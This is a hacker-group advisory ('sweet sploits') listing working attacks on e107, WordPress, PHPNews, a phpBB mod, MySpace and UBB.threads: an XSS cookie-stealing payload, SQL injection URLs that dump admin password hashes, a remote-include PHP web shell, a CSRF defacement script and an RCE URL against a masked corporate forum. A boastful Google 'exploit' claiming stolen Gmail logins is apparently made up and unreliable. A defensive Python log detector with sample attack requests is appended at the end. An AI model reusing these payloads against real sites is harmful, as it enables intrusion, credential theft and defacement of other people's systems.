`#################################
# Multi-CMS/Forum Vulnerabilities #
# Found by ap0c hackers #
# pacifico & ratboy #
#################################
Yo! Ok, well a couple new vulnerabilities have been found by.. us :)
------------------
First; e107 xss---
------------------
[link=http://w000000w00tw00t/asdadLI[link=
onMouseOver='alert(document.cookie);' h1d3="]<[size=24]HIGHLIGHT
ME!!11!1!!!!!1111!!!!!!11!!1!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![/size]>[/link][link=h1d3me=']][/link][/link]
Enter this into any message, signature, et cetera, and when highlighted
it will alert with the user's cookie. This *may* be further
exploitable; but we are not sure; as we've been very busy ;)
------
next; wordpress blog sql injection ---
------
http://path/to/wordpress/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*
This will give the administrator hash for the wordpress blog/CMS. We
have also found that if you spoof your browser to something like:
<?php phpinfo(); ?>, and have a failed login attempt; it is eval'd,
and you can execute your own code.
------
Now; PHPNews latest release remote include(); exploit
------
http://path/to/php/news/auth.php?path=http://path/to/exploit/&c=uname%20-a
Ok, now you'll need a host, and change (http://path/to/exploit/) to
your host. Now, you will make a directory called "languages". Then in
a file named "en_GB.admin.lng", put something like this code:
<?php
$rawr=$_GET['c'];
echo(`$rawr`);
?>
kthx.
-----
And; Knowledge Base PHPBB Mod SQL Injection Exploit
-----
Righto.. so you find a phpbb forum that says: 'Powered by Knowledge
Base MOD, wGEric & Haplo (c) 2002-2005' at the bottom, eh?
Now, this is totally vulnerable. (the mod changes the index.php to kb.php)
http://path/to/forum/kb.php?mode=article&k=10%20UNION%20SELECT%200,user_password%20FROM%20phpbb_users%20WHERE%20user_id=2%20LIMIT%201/*%20&rush=%00
:)
-----
!!!!!!Google.com!!!!!SQL!!!!!Injection!!!!!Exploit!!!!!!
-----
Ok, we expect this to be fixed right away, so be sure to do it quick ;)
Giving google the query:
-b: *++*' UNION SELECT ass,ass from ASS,ass%00/*
Causes an error of "database gm-google.ass does not exist". We've
gotten a few user/pass's for gmail with this ;)
This is done by confusing Google's "calculator", so it does *NOT* check
the query to make sure it's valid.
You'd be surprised how insecure google is; when looked at closely. We
also had a bindshell; but they found out; and that's fixed now.
-----
MySpace.com User Profile Defacement.
-----
Once again, this may be fixed very soon.
This code should be efficient;
<?php
$g1=$_GET['t'];
$g2=$_GET['f'];
echo('
<form action="http://myspace.com/index.cfm?fuseaction=user.addComment"
method="post" name="commentForm">
<input type="hidden" name="hashcode"
value="MIGKBgkrBgEEAYI3WAOgfTB7BgorBgEEAYI3WAMBoG0wawIDAgABAgJmAwICAMAECGU6VlkoYLOqBBCZiLLKnlWybUUua3SB/xxzBED1fsg4c0zRcY4B8IWZgNbTdYkd/pUk6zpuLXZZAhwC+oxKfrwgQfy+Qnj7XB4pXWTRvgumgCUHsjtspz8/kt6a">
<input type="hidden" name="FriendID" value="' . $f . '24822493">
<input type=hidden name=Mytoken value=' . $t . '>
');
echo ('
<input type="hidden" name="f_comments"
value='%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTD%3E%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTABLE%3E%3CTR%3E%3Cimg%20src%3D%22http%3A%2F%2Flemonparty.org%2Flemonparty.jpg%22%3E%3CFONT%20SIZE%3D%2224%22%20COLOR%3D%22RED%22%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22down%22%3Eowned.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22left%22%3Eby.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22up%22%3Eap0c.%3C%2Fmarquee%3E%3CBR%3E%3Cnoscript%3E'>
<input type="submit" value="Post Comment" onClick="this.disabled =
true; document.commentForm.submit();">
</form>
');
?>
example url: http://localhost/myspace0wn.php?t=20050827111256&f=6617
This would deface profile 6617 if the (t) variable is that users friend.
ktx.
-----
Forums ("UBB.threads 6.3.2") Remote Code Execution.
-----
These boards are very popular among corporate sites (*cough*NBC,CNN*cough*)
http://bo**ds.n**.***/bb/printthread.php?Board=%22);&main='));%3C?php%20phpinfo();%20?%3E&type=post
This would execute phpinfo(); on the victims server.
##########################
## That's all for this ##
## "issue" of sweet ##
## sploits... sincerely ##
## pacifico and ratboy ##
##########################
Contact? [email protected]
-EOF-
`
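A defender's view of the request shapes in this advisory, as an added example (not code from the original post): a small Python triage function for web access logs that flags double percent-encoding, UNION SELECT, URL-valued parameters, null bytes and PHP open tags in a parameter or the User-Agent. The rule names, function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Hypothetical rule names; each regex runs on a fully decoded parameter value.
RULES = [
    ("sqli-union-select", re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)),
    ("php-open-tag", re.compile(r"<\?(php|=|\s)", re.I)),
    ("null-byte", re.compile(r"\x00")),
    ("remote-url-value", re.compile(r"^\s*(https?|ftp)://", re.I)),
]

def fully_decode(value, max_rounds=4):
    """Percent-decode until stable; return (text, number of rounds that changed it)."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def classify(request_target, user_agent=""):
    """Return the sorted names of the rules a request target and User-Agent trigger."""
    hits = set()
    query = urlsplit(request_target).query
    for pair in filter(None, query.split("&")):
        _, _, raw = pair.partition("=")
        value, rounds = fully_decode(raw.replace("+", " "))
        if rounds >= 2:  # e.g. %2527 -> %27 -> ' hides a quote from a single-pass filter
            hits.add("double-encoding")
        hits.update(name for name, rx in RULES if rx.search(value))
    if RULES[1][1].search(user_agent):  # PHP tag in a header that later gets logged
        hits.add("php-tag-in-user-agent")
    return sorted(hits)

# Constructed sample requests (target, User-Agent), shaped like those in the advisory.
SAMPLES = [
    ("/index.php?cat=%2527%20UNION%20SELECT%20user_pass%20FROM%20wp_users/*", "Mozilla/5.0"),
    ("/auth.php?path=http://attacker.example/&c=id", "Mozilla/5.0"),
    ("/kb.php?mode=article&k=10%20UNION%20SELECT%200,1/*&rush=%00", "Mozilla/5.0"),
    ("/wp-login.php", "<?php phpinfo(); ?>"),
    ("/index.php?cat=3&paged=2", "Mozilla/5.0"),
]

if __name__ == "__main__":
    for target, agent in SAMPLES:
        print(target[:40], classify(target, agent))
```

Decoding to a fixed point before matching is what catches the `%2527` form; a filter that decodes only once sees `%27` and passes it through.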